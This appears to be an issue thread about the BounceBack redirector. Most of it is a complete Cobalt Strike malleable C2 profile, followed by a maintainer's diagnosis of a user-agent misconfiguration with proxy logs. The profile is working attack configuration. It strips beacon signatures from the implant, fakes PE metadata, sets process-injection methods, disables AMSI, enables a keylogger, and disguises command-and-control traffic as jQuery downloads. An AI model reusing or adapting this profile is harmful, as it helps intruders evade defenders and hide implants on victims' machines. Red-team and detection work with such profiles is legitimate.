Please give me an example of a profile that was rejected.
set host_stage "false";
set sleeptime "60000000";
set jitter "45";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20";
# Task and Proxy Max Size
set tasks_max_size "1048576";
set tasks_proxy_max_size "921600";
set tasks_dns_proxy_max_size "71680";
set data_jitter "100";
set smb_frame_header "";
set pipename "SapIServerPipes-1-5-5-07903";
set pipename_stager "SapIServerPipes-1-5-5-04218";
set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
set ssh_pipename "SapIServerPipes-1-5-5-0##";
stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";
#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";
set checksum "0";
set compile_time "31 Jul 2090 12:56:16";
set entry_point "186192";
set image_size_x86 "1490944";
set image_size_x64 "1490944";
set name "WMNetMgr.DLL";
set rich_header "\x35\xe0\x65\x56\x71\x81\x0b\x05\x71\x81\x0b\x05\x71\x81\x0b\x05\x2a\xe9\x08\x04\x72\x81\x0b\x05\x2a\xe9\x0f\x04\x66\x81\x0b\x05\x71\x81\x0a\x05\xf7\x80\x0b\x05\x2a\xe9\x0a\x04\x7c\x81\x0b\x05\x2a\xe9\x0e\x04\x79\x81\x0b\x05\x2a\xe9\x0b\x04\x70\x81\x0b\x05\x2a\xe9\x05\x04\xb9\x81\x0b\x05\x2a\xe9\xf4\x05\x70\x81\x0b\x05\x2a\xe9\x09\x04\x70\x81\x0b\x05\x52\x69\x63\x68\x71\x81\x0b\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
transform-x86 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "NtQueueApcThread" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "beacon.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
transform-x64 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "beacon.x64.dll" "";
strrep "NtQueueApcThread" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "beacon.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
}
process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";
# shape the content and properties of what we will inject
set min_alloc "8192";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
transform-x64 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
# specify how we execute code in the remote process
execute {
CreateThread "ntdll.dll!RtlUserThreadStart+0x631";
NtQueueApcThread-s;
SetThreadContext;
CreateRemoteThread;
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
RtlCreateUserThread;
}
}
post-ex {
# control the temporary process we spawn to
set spawnto_x86 "%windir%\\syswow64\\mtstocom.exe";
set spawnto_x64 "%windir%\\sysnative\\mtstocom.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# control the method used to log keystrokes
set keylogger "GetAsyncKeyState";
}
post-ex {
set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
set pipename "Winsock2\\CatalogChangeListener-###-0,";
set keylogger "GetAsyncKeyState";
}
set steal_token_access_mask "0"; # TOKEN_ALL_ACCESS
stage {
set allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set magic_pe "NO";
set userwx "false";
set stomppe "true";
set obfuscate "true";
set cleanup "true";
set sleep_mask "true";
set smartinject "true";
set checksum "0";
set compile_time "11 Nov 2016 04:08:32";
set entry_point "650688";
set image_size_x86 "4661248";
set image_size_x64 "4661248";
set name "srv.dll";
set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
set syscall_method "None";
transform-x86 { # transform the x86 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
}
transform-x64 { # transform the x64 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
}
stringw "jQuery"; # Add this string to the DLL
}
process-inject {
set allocator "NtMapViewOfSection";
set bof_allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set bof_reuse_memory "true";
set min_alloc "17500";
set startrwx "false";
set userwx "false";
transform-x86 {
prepend "\x90\x90";
}
transform-x64 {
prepend "\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart+0x42";
CreateThread;
NtQueueApcThread-s;
CreateRemoteThread;
RtlCreateUserThread;
}
}
http-config {
set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
header "Server" "Apache";
header "Keep-Alive" "timeout=10, max=100";
header "Connection" "Keep-Alive";
set trust_x_forwarded_for "true";
set block_useragents "curl*,lynx*,wget*";
set allow_useragents "curl*,lynx*,wget*";
}
http-get {
set uri "/jquery-3.3.1.min.js";
set verb "GET";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
metadata {
base64url;
prepend "__cfduid=";
header "Cookie";
}
}
server {
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
output {
mask;
base64url;
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
}
http-post {
set uri "/jquery-3.3.2.min.js";
set verb "POST";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
id {
mask;
base64url;
parameter "__cfduid";
}
output {
mask;
base64url;
print;
}
}
server {
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
output {
mask;
base64url;
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
}
I tested your profile and found a bug related to user agents. All tests were done with CS 4.4.
In the profile you provided, both block_useragents and allow_useragents are enabled and equal, which causes BounceBack (and CobaltStrike) to reject every request it receives.
set block_useragents "curl*,lynx*,wget*";
set allow_useragents "curl*,lynx*,wget*";
Here you can see a BounceBack log in which requests are blocked because of the wrong user-agent configuration:
2023-11-08T17:50:14+03:00 INF Starting proxy listen=0.0.0.0:80 proxy="example http proxy" target=http://127.0.0.1:8080 type=http
2023-11-08T17:50:35+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Cookie":["__cfduid=asDRcEsge9ZI1zmsXpNAYC2nXQNh41HI_gDYvJSrJXsiPfqmoq1JbSY_85YhtyeyMd4X0BLHa6gabvf43BqZgU7JzogbjmliCgnHqRlLaUrHLVrRztUKaTD0XeyqBrGlZM9DIfr6CnSfOOuMx3FUg73FB0yyxKBOIX5m0pnsZ-E"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=GET proxy="example http proxy" url=/jquery-3.3.1.min.js
2023-11-08T17:50:35+03:00 DBG allow_useragents did not match from=192.168.40.129 match=["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"] proxy="example http proxy" rule=example_malleable_rule
2023-11-08T17:50:35+03:00 WRN Rejected from=192.168.40.129 proxy="example http proxy" rule=example_malleable_rule
And even if CobaltStrike received that request directly, without BounceBack, it would also block the request:
[!] Request not allowed for useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/81.0.4044.34 safari/537.36 edg/81.0.416.20'. URI=/jquery-3.3.1.min.js Method=GET Remote Address=/127.0.0.1
However, if you fix your profile (for the tests I just removed the allow_useragents setting), it will work as intended:
2023-11-08T17:43:36+03:00 DBG Created new proxy listen=0.0.0.0:80 proxy="example http proxy" target=http://127.0.0.1:8080 type=http
2023-11-08T17:43:36+03:00 INF Starting proxy listen=0.0.0.0:80 proxy="example http proxy" target=http://127.0.0.1:8080 type=http
2023-11-08T17:44:49+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Cookie":["__cfduid=jiJOtks55p8HeU7XqqTocs9verc1mwmPUas_gnsOtx5ZUstsq3YHPbjqW6Vz5hay5WmAtupYUZn2dES649mGD9bSnrTjgUN-oATHAQMVArEistKoy8id6diXFSqU2FPPwk3nuJNbuPzO1A10ZO6VeVxvlnPlLkSzZ2lFBVa_MmI"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=GET proxy="example http proxy" url=/jquery-3.3.1.min.js
2023-11-08T17:44:49+03:00 DBG http-get match from=192.168.40.129 match= proxy="example http proxy" rule=example_malleable_rule
